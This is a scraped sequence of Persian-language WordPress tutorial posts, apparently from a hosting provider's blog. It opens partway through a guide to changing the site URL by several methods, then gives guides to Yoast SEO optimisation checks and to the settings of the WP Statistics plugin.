بعد از اینکه آدرس‌های خود را ثبت کردید تنظیمات را ذخیره کرده و سایت خود را مشاهده کنید. خواهید دید که اگر در ساختار وردپرس مشکل داشته‌اید برطرف شده است. در صورتی هم که قصد تغییر دامنه در وردپرس را داشته باشید بعد از ذخیره تنظیمات از این بخش آدرس دامنه در وردپرس به دامنه جدید تغییر پیدا خواهد کرد.


روش دوم: آموزش تغییر URL در وردپرس با استفاده از دیتابیس

در این روش کاری که می‌کنید اینه که به صورت مستقیم از طریق دیتابیس اقدام به ویرایش‌های آدرس در وردپرس می‌کنید. برای این کار باید وارد هاست خودتون شده و سپس به phpmyadmin برای دسترسی به دیتابیس مراجعه کنید. بنابراین بعد از اینکه وارد هاست خودتون شدید روی گزینه phpmyadmin کلیک کنید تا به صفحه مدیریت پایگاه داده در هاست هدایت شوید.

phpmyadmin

بعد از اینکه وارد phpmyadmin شدید ممکنه از شما نام کاربری و رمز درخواست بشه، بنابراین از همان نام کاربری و رمز عبور که برای هاست استفاده می‌کنید در اینجا هم استفاده کنید. بعد از اینکه وارد پایگاه داده شدید، از ستون سمت چپ پایگاه داده خودتون را انتخاب کنید تا جداول پایگاه داده نمایش داده شوند. سپس روی جدول wp_options کلیک کنید تا جدول تنظیمات پایگاه داده وردپرس نمایش داده شود. البته دقت کنید در صورتی که هنگام نصب وردپرس اقدام به تغییر پیشوند جداول در وردپرس کرده باشید این نام متغییر بوده و به جای _wp از یک پیشوند دیگه استفاده خواهد شد. پس در هر صورت باید جدول پایگاه داده شما شامل پسوند options باشد.

تغییر نشانی سایت در وردپرس و نحوه تغییر url در وردپرس

حالا همونطور که در تصویر میبینید باید دو فیلد siteurl و home را که میبینید ویرایش کنید. بنابراین روی دکمه Edit هر یک از این دو گزینه کلی کنید تا به صفحه ویرایش اونها هدایت شوید. سپس مشابه تصویر زیر در فیلد option_value آدرس سایت خود را به همراه http وارد کنید. در صورتی که اقدام به نصب SSL در وردپرس کردید باید این آدرس را همراه https وارد کنید.

تغییر نشانی سایت در وردپرس و نحوه تغییر url در وردپرس

توجه داشته باشید که، اگر قصد تغییر دامنه در وردپرس را دارید باید در این فیلد آدرس دامنه جدید خود را که روی هاست ست شده باشد وارد کنید. اما اگر در ساختار آدرس‌ها مشکل دارید آدرس دامنه را وارد کرده و روی دکمه Go کلیک کنید. همچنین آدرس وارد شده باید فاقد / پایانی در آدرس دامنه باشد.

بعد از اینکه آدرس siteurl ویرایش شد مجددا همین کار را برای home نیز تکرار کرده و آدرسی که در siteurl وارد کردید در این بخش هم وارد کنید. اگر با مشکل ساختار آدرس مواجه هستید حتی اگر آدرس‌های این دو فیلد هم درست بودند یک بار روی دکمه Go کلیک کنید تا به‌روز شوند.


روش سوم: آموزش تغییر آدرس URL در وردپرس با استفاده از wp-config.php

در این روش با استفاده از قرار دادن کدهای siteurl و home در فایل wp-config.php وردپرس میتونید ساختار آدرس در وردپرس را اصلاح کرده یا اینکه اقدام به تغییر آدرس دامنه در وردپرس بکنید. برای این منظور ابتدا وارد هاست خود شده و سپس روی گزینه File manager کلیک کنید تا به صفحه مدیریت فایل‌ها در هاست هدایت شوید.

تغییر نشانی سایت در وردپرس و نحوه تغییر url در وردپرس

سپس در مسیر public_html که وردپرس را در دامنه اصلی نصب کردید به دنبال فایلی با نام wp-config.php بگردید. روی فایل راست کلیک کرده و گزینه Edit را انتخاب کنید. سپس در صفحه ویرایش فایل کدهای زیر را درست زیر کدهایی که با نام define یعنی قبل از خط That’s all, stop editing! Happy blogging قرار دهید.

define('WP_HOME','http://mizbanfa.net');
define('WP_SITEURL','http://mizbanfa.net');

حالا همونطور که در کدهای بالا مشاهده می‌کنید آدرس دامنه خود را به جای http://mizbanfa.net وارد کنید. دقت کنید که در اینجا هم اگر از SSL استفاده می‌کنید حتما آدرس را همراه با https وارد کنید. همچنین از قرار دادن / در انتهای آدرس سایت هم دوری کنید. بعد از ذخیره فایل اگر آدرس سایت را باز کنید خواهید دید که مشکل ساختار ادرس در وردپرس حل شده است. در صورت تغییر دامنه سایت هم همین اتفاق رخ خواهد داد، اما اگر هدف شما تغییر دامنه سایت هست حتما از روش دوم که در این آموزش ذکر شده استفاده کنید.


روش چهارم: آموزش تغییر نشانی سایت در وردپرس با فانکشن قالب

در این روش باید با قرار دادن کد در فایل فانکشن اقدام به اصلاح آدرس در وردپرس بکنید. برای این منظور در File Manager هاست به مسیر /public_html/wp-content/themes/ مراجعه کرده و سپس وارد پوشه قالبی که از آن استفاده میکنید شوید. سپس در این پوشه به دنبال فایلی با نام functions.php بگردید و کدهای زیر را در ابتدای این فایل بعد از خط <?php در فایل قرار دهید.

update_option( 'siteurl', 'http://mizbanfa.net' );
update_option( 'home', 'http://mizbanfa.net' );

در کدهای بالا به جای آدرس دامنه میزبان‌فا آدرس سایت خود را به همراه پروتکل http >ارد کنید، اگر از SSL استفاده می‌کنید آدرس را همراه با HTTPS وارد کرده و در فایل قرار دهید. حالا بعد از قرار دادن کد و ذخیره فانکشن قالب وارد پیشخوان وردپرس شوید. خواهید دید که مشکل برطرف شده است. حالا برای اینکه در هربار ورود به پیشخوان وردپرس این کد اجرا نشود بعد از رفع مشکل کدهایی که در بالا قرار دادید را از فایل فانکشن قالب خود حذف کنید.


روش پنجم: آموزش تغییر آدرس صفحات در وردپرس به روش انتقال

در این روش شما از یک جابجایی اتوماتیک که در هسته وردپرس قرار دارد استفاده خواهید کرد. که در هنگام انتقال وردپرس از یک هاست به هاست دیگر کاربرد دارد. در این روش از طریق فایل wp-config.php وردپرس کارهای به‌روزرسانی ادرس وردپرس انجام خواهد گرفت. بنابراین وارد File Manager شده و سپس کد زیر را در فایل wp-config.php در بخشی که کدهای define قرار دارند قرار دهید. دقت کنید که مقدار این کد باید روی True قرار داشته باشد.

define('RELOCATE',true);

حالا بعد از ذخیره فایل wp-config.php باید به صفحه ورود در وردپرس مراجعه کنید. بنابراین آدرس دامنه خود را وارد کرده و به انتهای آن wp-login.php/ را اضافه کنید تا فرم ورود به وردپرس نمایش داده شود. در این صورت کدهای زیر در فایل wp-login.php شروع به کار خواهند کرد.

if ( defined( 'RELOCATE' ) &amp;&amp; RELOCATE ) { // Move flag is set
if ( isset( $_SERVER['PATH_INFO'] ) &amp;&amp; ($_SERVER['PATH_INFO'] != $_SERVER['PHP_SELF']) )
$_SERVER['PHP_SELF'] = str_replace( $_SERVER['PATH_INFO'], , $_SERVER['PHP_SELF'] );

$url = dirname( set_url_scheme( 'http://' .  $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] ) );
if ( $url != get_option( 'siteurl' ) )
update_option( 'siteurl', $url );
}

اگر فرم ورود به وردپرس به شما نمایش داده شد و آدرس دامنه در آن به درستی نمایش داده شد فرم ورود به وردپرس را که شامل وارد کردن نام کاربری و رمز ورود به وردپرس است را پر کرده و روی دکمه ورود کلیک کنید. در این صورت وارد پیشخوان وردپرس خواهید شد و کافی است به مسیر تنظیمات> عمومی مراجعه کرده و مشابه روش اول آدرس دامنه سایت خود را در تنظیمات وردپرس چک کنید تا به درستی وارد شده باشند. در غیر این صورت میتوانید آدرس‌های خود را ویرایش کرده و اصلاح کنید. در نهایت وارد wp-config.php شده و کدی که در این فایل قرار دادید را پاک کرده یا اینکه مقدار آن را روی false قرار دهید.

امیدوارم که این آموزش هم مورد توجه و پسند شما قرار گرفته باشه و با استفاده از اون تونسته باشید اقدام به تغییر نشانی در وردپرس کرده و URL ّای وردپرس را اصلاح کنید. در صورتی که در روش‌های گفته شده در این مقاله برای تغییر دامنه در وردپرس سوال یا مشکلی داشتید در بخش دیدگاه‌ها اعلام کنید تا در کوتاه‌ترین زمان ممکن پاسخگوی شما باشم.

نوشته آموزش تغییر نشانی سایت در وردپرس اولین بار در پدیدار شد.

آموزش سبز کردن چراغ سئو در افزونه Yoast SEO

$
0
0

سبز کردن چراغ سئو در افزونه Yoast SEO به معنی این است که محتوایی که تولید کرده‌اید به صورت بهینه شده تولید شده است. یکی از مواردی که در سئو و بهینه سازی سایت مهم است نوشتن محتوای با کیفیت و اصولی با رعایت نکات سئو می‌باشد. نکات سئو که باید در محتوای مطالب رعایت کنید شامل مواردی مثل زیر هستند:

  • تولید محتوا با بیش از حداقل 1500 کلمه
  • استفاده از تگ‌های هدینگ H1 تا H6
  • استفاده از کلمه کلیدی در عنوان نوشته
  • استفاده از کلمه کلیدی در آدرس(نامک) نوشته
  • لینک دادن به چند منبع خارجی
  • ALT گذاری روی تصاویر و بهینه کردن آنها
  • استفاده از کلمات کلیدی به تعداد درست درون محتوا
  • استفاده Bold کردن برخی کلمات کلیدی
  • قرار دادن توضیحات متا
  • لینک سازی داخلی و لینک دادن به مطالب مرتبط درون نوشته
  • و…

حالا این سوال پیش میاد که چطور همه این نکات را در نوشته خودمان بررسی و رعایت کنیم؟ اصلا از چه طریقی متوجه شویم که تا چه میزان از کلمه کلیدی استفاده شده است؟ آیا تصاویر دارای خاصیت alt هستند؟ و کلی سوالات دیگر از این قبیل که به دنبال راهی برای بررسی آنها در نوشته هستیم. همونطور که در آموزش نصب افزونه YOAST SEO ذکر کردم این افزونه چنین قابلیت‌هایی را در اختیار شما قرار داده و به عنوان یک آنالیزگر متن عمل می‌کند. کافی است کلیدواژه کانونی یا همان کلمه کلیدی خود را بعد از اینکه محتوا تولید شد وارد کرده و به بررسی مشکلات، بهبودها و نتایج خوب در بخش تحلیل و بررسی افزونه سئو وردپرس برای بررسی محتوای خود بپردازید.

در این حالت چک لیستی به صورت زیر برایتان نمایش داده میشه که وضعیت هر یک از اولویت‌های سئو مطالب وردپرس و سبز کردن چراغ سئو در این افزونه به شما نمایش داده میشه که با رعایت کردن درصدی از هر چک لیست میتونید چراغ و امتیاز نهایی که برای نوشته داده میشه را سبز کنید.

سبز کردن چراغ سئو در افزونه Yoast SEO و سئو مطالب در وردپرس

همین که در حال نوشتن هستید و کاراکتر به کاراکتر محتوای خود را افزایش می‌دهید در صورتی که از همان ابتدا کلیدواژه کانونی را انتخاب کرده باشید افزونه به بررسی محتوا پرداخته و در هر لحظه آخرین وضعیت سئو مطالب در وردپرس را بر اساس همین کلمه کلیدی بررسی خواهد کرد. حال همه این چک لیست‌ها در سه بخش تهیه و گردآوری می‌شوند که عبارتد از:

  • مشکلات: بخش‌هایی که امتیاز کافی ندارند و باید ابتدا آنها را بهبود دهیم تا به مرحله بعد وارد شوند و سپس بعد از آن باز هم با بهبود بیشتر در نهایت رنگ آن را به سبز تغییر دهیم. بخش مشکلات با رنگ قرمز نمایش داده می‌شوند.
  • بهبودها: این بخش از هر چک لیست با رنگ نارنجی نمایش داده می‌شود. به این معنی است که وضعیت بهینه بودن چک لیست سئو در حد متوسط قرار دارد و باید برای بهبود آن و دریافت نمره کافی تلاش کنید تا رنگ سبز را دریافت کنید.
  • نتایج خوب: این بخش از هر چک لیست هم به معنی دریافت امتیاز کافی برای هر چک لیست سئو است که با رنگ سبز نمایش داده می‌شود.

پس با این حالت باید تمام تلاش خود را بکنید که هر چک لیست که در وضعیت قرمز و نارنجی قرار دارد را بهبود داده و به رنگ سبز تغییر حالت بدین تا نشون دهنده بهینه بودن نوشته شما باشد.

آموزش سبز کردن چراغ سئو در افزونه Yoast SEO

همونطور که در بالا هم گفتم برای سبز کردن چراغ سئو در افزونه سئو وردپرس و دیافت امتیاز کافی برای نوشته‌ها باید هر یک از چک لیست‌هایی که در بخش تحلیل و بررسی قرار گرفتند بهبود دهید تا به رنگ سبز رنگ درآیند. در ادامه به معرفی هر یک از این موارد می‌پردازم.

هیچ کلیدواژه‌ی کانونی برای این برگه تعیین نشده است

انتخاب کلید واژه کانونی اولین کاری است که برای محاسبه وضعیت بهینه بودن مطالب در وردپرس و سبز کردن چراغ سئو افزونه yoast seo باید انجام دهید. در این مورد به شما پیشنهاد می‌شود که کلمه کلیدی اصلی نوشته خود را وارد کنید. سعی کنید کلیدواژه کانونی بر اساس پر جستجوترین کلمه‌ای که کاربران در گوگل به دنبال آن هستند را انتخاب کنید. برای یافتن آن میتوانید از ابزار گوگل ترندز یا kwfinder استفاده کنید. بعد از انتخاب کلیدواژه کانونی محتوا آنالیز و بررسی می‌شود و در هر بار که بخشی به آن اضافه می‌کنید، هر یک از چک لیست‌ها که در ادامه توضیح می‌دهم بر اساس همین کلمه انتخاب شده امتیاز قرمز، نارنجی یا سبز را دریافت خواهند کرد.

سبز کردن چراغ سئو در افزونه Yoast SEO و سئو مطالب در وردپرس

کلید واژه تمرکزی در اولین پاراگراف رونوشت، ظاهر نمی‌شود

گفته می‌شود که موتورهای جستجو به پاراگراف ابتدایی متن علاقه بیشتری دارند. به عبارت دیگر اولین پاراگراف از نوشته شما نشان دهنده موضوع و محوریت نوشته است که بر اساس کلمه کلیدی هم برای کاربران و هم برای موتورهای جستجو مشاهده و درک خواهد شد. بنابراین از کلمه کلیدی خود در پاراگراف اول استفاده کنید. همچنین پاراگراف اول را حتما طوری بنویسید که برای کاربران نیز جذاب باشد. اگر کاربری با پاراگراف اول نوشته شما ارتباط خوبی برقرار نکند در بیشتر موارد از سایت خارج خواهد شد.

متن شامل 0 کلمه می‌باشد

این پیغام وقتی محتوایی در نوشته قرار نداشته باشد نمایش داده می‌شود. بر اساس توصیه افزونه سئو گفته می‌شود که محتوای تولید شده برای مطالب حداقل باید دارای 300 کلمه باشد. اما بر اساس تجربه‌ای که در طول این مدت نویسندگی به دست آورده‌ام و نظر بسیاری افراد هم همینطور است سعی نکنید به این گزینه بسنده کنید. یک محتوای خوب از نظر گوگل محتوایی است که بیش از 1500 کلمه باشد. بنابراین محتوایی بنویسید که به صورت کاملا جامع و شامل باشد.

هیچ تصویری در این صفحه ظاهر نمی‌شود

استفاده از تصاویر در نوشته علاوه بر اینکه باعث شکل دادن و ظاهر بهتر در سایت می‌شوند برای موتورهای جستجو هم جذاب هستند. بیشتر کاربران در حال جستجو تصاویر هستند، موتورهای جستجو نظیر گوگل هم طوری طراحی شده‌اند که علاوه بر نمایش نتایج وب بسته به کلمه جستجو شده تصاویری را هم نمایش می‌دهند. گذشته از این بر اساس آخرین تغییر گوگل در جستجوی تصاویر دکمه مشاهده تصویر(لینک مستقیم عکس) حذف شده و به جای آن دکمه Visit Site نمایش داده می‌شود. بنابراین این فرصت خوبی است تا با بهینه کردن تصاویر بازدیدهای بخش جستجوی تصویر گوگل را به سایت خود جذب کنید.

تصاویر موجود در این برگه خاصیت alt ندارند

بعد از انتخاب تصویر در نوشته، این خطا نمایش داده می‌شود. از شما خواسته می‌شود که alt تصویر را وارد کنید. در وردپرس برای افزودن alt تصویر کافی است روی تصویر کلیک کنید و سپس آیکون مداد را انتخاب کنید. حالا مشابه تصویر زیر کیمه کلیدی خود را به همراه توضیحات مربوط به عکس در فیلد متن جایگزین وارد کنید.

سبز کردن چراغ سئو در افزونه Yoast SEO و سئو مطالب در وردپرس

برای اینکه تصاویر موجود در نوشته بهینه‌تر باشند توصیه می‌کنم از نام مناسب با موضوع نوشته، توضیح(کپشن) تصویر هم استفاده کنید تا شانس نمایش در نتایج بالاتر تصاویر را داشته باشید.

هیچ لینک درونی در این برگه ظاهر نمی‌شود

لینک سازی داخلی در کنار افزودن نقشه سایت در وردپرس به موتورهای جستجو کمک می‌کنند تا پیمایش در سایت و بررسی صفحات بهتر و عمیق‌تر صورت گیرد. با لینک دادن به نوشته‌های مرتبط در محتوای نوشته ارزش مطالب را افزایش داده و آنها را مانند یک زنجیر به هم متصل کنید. در این حالت هم نوشته برای موتور جستجو ارزشمندتر خواهد شد و هم اینکه کاربران با کلیک روی لینک‌ها از سایر نوشته‌ها هم بازدید کرده و بیشتر در سایت باقی خواهند ماند.

لینکی در این برگه ظاهر نمی‌شود

این گزینه هم درست مانند حالت قبلی است با این تفاوت که در اینجا منظور لینک‌های خارجی هستند. بر اساس آخرین تغییرات الگوریتم گوگل لینک کردن به منابع یک نوشته و یا سایت‌هایی که مشابه همین نوشته را تولید کرده‌اند می‌تواند ارزش گذاری محتوا را بیشتر کند. چرا که موتورهای جستجو قادر به درک کامل صفحات هستند و دو صفحه از دو سایت مختلف را از نظر محتوایی بررسی کرده و می‌دانند که نوشته در چه موضوعی نوشته شده است. پس سعی کنید حتما به سایت‌های معتبر مثل ویکی‌پدیا و… یک لینک بدهید. البته لینک‌های خارجی را Nofollow کنید تا امتیاز نوشته شما حفظ شوند. برای اینکار هم میتوانید از آموزش نوفالو کردن لینک های خروجی وردپرس استفاده کنید.

کلید واژه‌ی کانونی “X” در عنوان سئو دیده نمی‌شود

یکی از اصلی‌ترین بخش‌ها برای قرار دادن کلمه کلیدی عنوان نوشته می‌باشد. برای اسنکه در افزونه سئو وردپرس کلمه کلیدی را در نوشته استفاده کنید روی دکمه ویرایش اسنیپت کلیک کنید تا مشابه تصویر فیلد عنوان سئو نمایش داده شود. سپس عنوان دلخواه خود را برای نوشته انتخاب کنید.

سبز کردن چراغ سئو در افزونه Yoast SEO و سئو مطالب در وردپرس

در انتخاب عنوان نوشته دقت کنید کلمه کلیدی انتخاب شده حتما در ابتدای نوشته قرار داشته باشد تا تاثیر بهتری در قرار گرفتن نتیجه بالاتر موتور جستجو به دست آورید.

عنوان سئو خیلی کوتاه است

در صورتی که عنوان سئو کوتاه باشد این خطا نمایش داده می‌شود. گفته می‌شود عنوانی که برای صفحات سایت باید انتخاب کنید بین 45 تا 65 کاراکتر باشد. بنابراین عنوانی برای نوشته خود انتخاب کنید که به اندازه کافی معرف نوشته شما باشد و این تعداد کاراکتر را شامل شود.

متای توضیحات مشخص نشده است

این بخش همان توضیحاتی است که در صفحه نتایج جستجو گوگل در زیر آدرس هر سایت نمایش داده می‌شود که به عنوان خلاصه‌ای 120 کلمه‌ای است. اما تغییراتی در گوگل رخ داده است که این توضیحات به 320 حرف افزایش پیدا کرده‌اند و از سوی دیگر انتخاب متا توضیحات به شکل هوشمندانه توسط خود گوگل انجام می‌گیرد. بنابراین فکر می‌کنم در آپدیت‌های آتی افزونه سئو وردپرس تغییرات عمده روی این بخش صورت گیرد. در حال حاضر اگر حتی توضیحات متا را وارد کنید با الگوریتم جدید گوگل توضیحات انتخاب نمایش داده نمی‌شود. بلکه این خود گوگل است که بر اساس کلمه کلیدی جستجو شده، متای توضیحات را از بخش‌های مختلفی از نوشته که کلمه کلیدی ذکر شده‌اند نمایش می‌دهد.

این مسئله می‌تواند یک مزیت برای نمایش نتایج بهتر در موتورهای جستجو باشد. بنابراین باید از کلمات کلیدی به گونه‌ای استفاده کنید که شامل کلمات دیگر که جستجو می‌کنند نیز باشد تا بهتر از قبل بتوانید در هر کلمه جستجو شده در صدر نتایج جستجو گوگل قرار بگیرید.

تراکم کلیدواژه‌ کانونی X% است، که خیلی کم است؛ کلیدواژه‌ی کانونی n بار پیدا شد

یکی دیگر از موارد مهم در سبز کردن چراغ سئو افزونه Yoast SEO استفاده از کلیدواژه کانونی به تعداد کافی است. بر اساس تعداد کلمات هر نوشته باید به تعداد دفعات مناسب کلمه کلیدی را در متن نوشته تگرار کرده باشید. این مقدار بین 1 تا 2.5 درصد برای محتوای نوشته است. به عنوان مثال اگر نوشته شامل 1.000 کلمه باشد باید چیزی بین 1 تا 3 بار کلمه کلیدی را تکرار کرده باشید.

کلید واژه تمرکزی در URL این صفحه ظاهر نمی‌شود

استفاده از کلمه کلیدی در آدرس سایت هم یکی دیگر از مواردی است که در سئو مطالب وردپرس و سبز کردن چراغ سئو تاثیرگذار است. اگر کلمه کلیدی که در آدرس مطالب استفاده می‌شوند وجود داشته باشد به دلیل بولد شدن کلمه کلیدی در ادرس سایت که در نتایج جستجو نمایش داده میشه شانس بیشتری خواهید داشت.

اما به دلیل اینکه ساختار آدرس برای زبان فارسی مناسب نیست و کاراکترهای آدرس URL در زبان فارسی تبدیل به کاراکترهای ناخوانا می‌شوند پیشنهاد می‌کنم استفاده از این مورد را جزو ملاک قرار نداده و از کلمات انگلیسی استفاده کنید.

شما به برگه دیگری با کلمه کلیدی اصلی لینک کرده‌اید

یکی از اشتباهاتی که برخی کاربران انجام می‌دهند این است که کلمه کلیدی انتخاب شده را به صفحه دیگری چه به صورت لینک داخلی و چه خارجی لینکدار می‌کنند. باید گفت که نوشته‌ای که شما تهیه کرده‌اید و کلمه کلیدی دلخواه خود را برای آن انتخاب کردید مختص شماست. پس باید کل تمرکز خود را روی بهبود این کلمه کلیدی بکنید که با این کلمه کلیدی مطلب و سایت شما نمایش داده شود.

سبز کردن چراغ سئو در افزونه Yoast SEO و سئو مطالب در وردپرس

در نهایت بعد از اینکه کلیه موارد فوق را برای نوشته خود رعایت کرده و امتیاز کافی برای هر بخش را دریافت کردید با تصویر بالا روبه‌رو خواهید شد.


سبز کردن چراغ سئو خوانایی افزونه سئو وردپرس

بعد از آپدیت افزونه سئو که چند ماهی از آن آپدیت نمی‌گذرد تب دیگری با نام خوانایی به آن اضافه شده است. خوانایی عبارت است از میزان بهینه بودن محتوا برای کاربران و هیچ ارتباطی با سئو نوشته ندارد. به عبارت دیگر این تب مربوط به سئو فرندلی بودن محتوا برای کاربر دارد که از خلاصه نویسی، پاراگراف کوتاه و… باید در ان استفاده شده باشد. خوانایی در افزونه سئو وردپرس بر سه اصل مهم تاکید دارد که عبارتند از:

  1. پاراگراف‌ها طولانی نباشند
  2. زیر هر تیتر(HEADING) بیشتر از 300 کلمه استفاده نشود
  3. جملات بیشتر از 20 کلمه نباشند. اگر برخی جملات بیشتر از 20 کلمه هستند در کل محتوای نوشته نباید بیشتر از 25 درصد کل نوشته را شامل شوند.

بعد از اینکه محتوای خود را بهینه کردید و کلیه امتیازان هر بخش را با رنگ سبز دریافت کردید به تب خوانایی مراجعه کرده و 3 شرط لازم برای خوانا کردن نوشته را هم بررسی کرده و این بار اقدام به سبز کردن چراغ سئو خوانایی در افزونه Yoast SEO بکنید.

امیدوارم که این آموزش هم مورد توجه و پسند شما قرار گرفته باشه و با استفاده از اون تونسته باشید اقدام به سئو کردن مطالب در وردپرس و سبز کردن چراغ سئو در افزونه سئو وردپرس بکنید. در صورتی که در رابطه با این آموزش و نحوه سئو کردن نوشته در وردپرس سوال یا مشکلی داشتید در بخش دیدگاه‌ها اعلام کنید تا در کوتاه‌ترین زمان ممکن پاسخگوی شما باشم.

نوشته آموزش سبز کردن چراغ سئو در افزونه Yoast SEO اولین بار در پدیدار شد.

آموزش نمایش آمار سایت در وردپرس

$
0
0

برای اینکه بتوان تعداد بازدید و آمار سایت را مشاهده کرد استفاده از افزونه نمایش آمار سایت در وردپرس به یک نیاز اساسی تبدیل شده است. همچنان که ما در حال فعالیت در سایت برای هدف کسب درآمد یا هر هدف دیگری هستیم لازم است تا آمار دقیقی از تعداد بازدیدها و سایت‌هایی که کاربران را به ما ارجاع میدهند داشته باشیم که بتونیم برای رشد سایت و راه‌هایی که میشه بازدید و ترافیک بیشتری جذب کرد برنامه‌ریزی کنیم. اینجاست که نمایش آمار سایت به میان میاد که با استفاده از اون میشه رفتار بازدیدکنندگان در سایت را دنبال کرد.

در این آموزش از پایگاه دانش میزبان‌فا قصد معرفی افزونه آمار وردپرس فارسی را دارم که با استفاده از این افزونه میتونید آمار کاربرانی که به سایت وارد می‌شوند را به همراه اطلاعاتی دیگر مشاهده کرده و به دست آورید. سپس با بررسی آمار ماهیانه و روزانه سایت روی بخش‌های سایت که ترافیک خوبی دریافت کردند بیشتر کار کرده و در عین حال برای صفحاتی که کم کاری شده تلاش کنید تا اونها را هم بهبود دهید.

آموزش نمایش آمار سایت در وردپرس

افزونه نمایش آمار سایت در وردپرس که قصد معرفی اونو دارم با نام WP Statistics در مخزن وردپرس به ثبت رسیده است و تاکنون موفق شده بیش از 400.000 نصب فعال و کسب امتیاز 4.3 را ازآن خودش بکنه که با استفاده از این افزونه میتونید آمار سایت خودتون را نمایش دهید. این افزونه به عنوان بهترین افزونه آمار وردپرس شناخته میشه که کاربران زیادی از اون برای نمایش آمار در وردپرس استفاده می‌کنند. برای استفاده از این افزونه کافیه روی دکمه زیر کلیک کنید و سپس بعد از اینکه وارد مخزن وردپرس شدید با استفاده از آموزش نحوه نصب و کار کردن با افزونه ها در وردپرس اقدام به نصب و فعال کردن افزونه در سایت وردپرسی خودتون بکنید.

دانلود افزونه WP Statistics

بعد از نصب و فعال کردن این افزونه مشابه تصویر زیر منویی با نام آمار در پیشخوان سایت وردپرسی شما اضافه خواهد شد که قبل از هر کاری باید به زیر منوی تنظیمات مراجعه کنید تا تنظیمات افزونه آمار وردپرس را به دلخواه خود تنظیم کنید.

نمایش آمار سایت در وردپرس با افزونه آمار وردپرس فارسی

تنظیمات عمومی افزونه آمار وردپرس

با مراجعه به صفحه تنظیمات افزونه آمار وردپرس 10 تب را مشاهده می‌کنید که با استفاده از هر یک از این تب‌ها میتونید تنظیمات همون بخش را برای افزونه آمارگیر وردپرس تنظیم و سفارشی سازی کنید. اولین تب با عنوان عمومی نمایش داده میشه که میتونید تنظیمات زیر را در اون اعمال کنید.

کاربران حاضر: این بخش مربوط به نمایش کاربران آنلاین در سایت یا همون نمایش آمار زنده در سایت هست که با فعال کردن اون میتونید تعداد افراد انلاین در سایت را در افزونه ببینید. برای این منظور ابتدا تیک گزینه Online User را فعال کنید. سپس از قسمت Check for online users every مشخص کنید که بررسی تعداد افراد حاضر در سایت چند ثانیه یک بار بررسی شود. برای اینکه زیاد روی هاست پردازش صورت نگیره بهتره که پیشفرض همین افزونه را روی 30 ثانبه در نظر بگیرید. برای اینکه آمار لحظه‌ای دقیق‌تر باشه و صرفا کاربران را مشخص کنه تیک گزینه Record all user را در حال غیرفعال بگذارید. چرا که اگر ربات در سایت وجود داشته باشه هم جزو کاربر به حساب میاد و امار واقعی نخواهد بود.

بازدیدها و بازدیدکنندگان: این دو بخش هم تعداد آمار کلی و تعداد یوزرها را نمایش خواهد داد. در صورت فعال کردن بازدیدها کل بازدیدهایی که هر کاربر از هر صفحه میکنه نمایش داده میشه و با فعال کردن بازدیدکنندگان هم تعداد کاربران هر روز نمایش داده خواهد شد. با استفاده از Coefficient per visitor هم میتونید یک ضریب برای تعداد کاربران بازدیدکننده تعریف کنید.

برگه ها و نوشته ها: با استفاده از این قسمت میتونید مشخص کنید که آمار محاسبه شده در سایت شامل چه صفحاتی باشند. در صورت فعال کردن هر گزینه آمار اون بخش در نظر گرفته نشده و محاسبه نخواهد شد.

Show stats in menu bar: با فعال کردن این بخش در قسمت متفرقه میتونید دکمه نمایش آمار را در منو پیشخوان وردپرس نمایش داده یا غیرفعال کنید.

موتورهای جستجو: با استفاده از این بخش میتونید تنظیمات هر موتور جستجو را شخصی سازی کنید. ابتدا تیک گزینه Add page title to empty search wordsرا فعال کنید تا اگر عبارات جستجو شده در موتور جستجو مشخص نشد بتونید ببینید کاربران با جستجوی چه چیزی به سایت شما ارجاع پیدا کردند. سپس از بخش پایینی امکان بررسی ورودی از هر موتور جستجو را فعال یا غیرفعال کنید.

نمودار: با فعال کردن گزینه Include totals هم میتونید نمودار را برای امار وردپرس در سایت فعال کنید که در پیشخوان وردپرس نمایش داده شود.

نمایش آمار سایت در وردپرس با افزونه آمار وردپرس فارسی

تنظیمات حریم خصوصی

این بخش مربوط به حریم خصوصی کاربران است که میتونید گزینه‌های مربوط به ذخیره داده‌ها و… را سفارشی سازی کنید. با فعال کردن گزینه Allow Opt-out امکان قبول قوانین GDPR که مربوط به مقررات مدیریت داده‌ها در اتحادیه اروپا هست فعال شده و در ویرایشگر میتونید متن دلخواه را برای قبول شرایط و قوانین وارد کنید. Hash IP Addresses هم امکان جلوگیری از آی پی مشکوک در سایت را فعال خواهد کرد. با فعال کردن گزینه Store entire user agent string هم حالت اشکال زدایی فعال خواهد شد.

نمایش آمار سایت در وردپرس با افزونه آمار وردپرس فارسی

تنظیمات اطلاعیه‌ها

این قسمت از افزونه آمار وردپرس امکان دریافت منظم اطلاعیه و تعداد آمار بازدید از سایت را در قالب یک ایمیل به شما خواهد داد. با فعال کردن این بخش میتونید یک ایمیل در افزونه وارد کنید و سپس بر اساس بازه زمانی دلخواه مشخص کنید که در چه بازه زمانی آمار بازدید سایت برای شما ارسال شود. برای این منظور کافیه Statistical reporting را فعال کرده و سپس از بخش Schedule بازه زمانی را در حالت‌های هر 5 دقیقه، ساعتی، روزانه یا ماهانه مشخص کنید تا از طریق ایمیل یا اس‌ام‌اس ارسال شوند. برای دریافت از طریق پیامک باید افزونه وردپرس اس‌ام‌اس را فعال کنید تا تنظیمات در افزونه برای sms نمایش داده شوند.

در نهایت با استفاده از بخش Message body و کدهایی که در این بخش در اختیارتون قرار میده میتونید مشخص کنید که چه آماری براتون در قالب ایمیل ارسال بشه و متن ارسالی را هم شخصی سازی کنید.

نمایش آمار سایت در وردپرس با افزونه آمار وردپرس فارسی

تنظیمات پیشخوان

با استفاده از این قسمت میتونید امکان نمایش دادن ابزارک آمار وردپرس را در بخش‌های مختلف سایت فعال یا غیرفعال کنید. با انتخاب هر یک از گزینه‌های موجود در این بخش ابزارک نمایش امار در وردپرس در اون بخش مخفی خواهد شد که به ترتیب عبارتند از:

  • Disable dashboard widgets: غیرفعال کردن نمایش ابزارک آمار وردپرس در پیشخوان وردپرس
  • Disable post/page editor widget: غیرفعال کردن نمایش ابزارک آمار وردپرس در صفحه نوشته و برگه وردپرس
  • Disable map: غیرفعال کردن نمایش نقشه در آمار وردپرس

نمایش آمار سایت در وردپرس با افزونه آمار وردپرس فارسی

تنظیمات سطح دسترسی

با استفاده از این قسمت میتونید حداقل سطح دسترسی برای مشاهده آمار وردپرس و مدیریت آمار وردپرس را انتخاب کنید تا کاربرانی که دارای این میزان دسترسی در وردپرس هستند قادر به مشاهده و مدیریت آمار در وردپرس باشند.

نمایش آمار سایت در وردپرس با افزونه آمار وردپرس فارسی

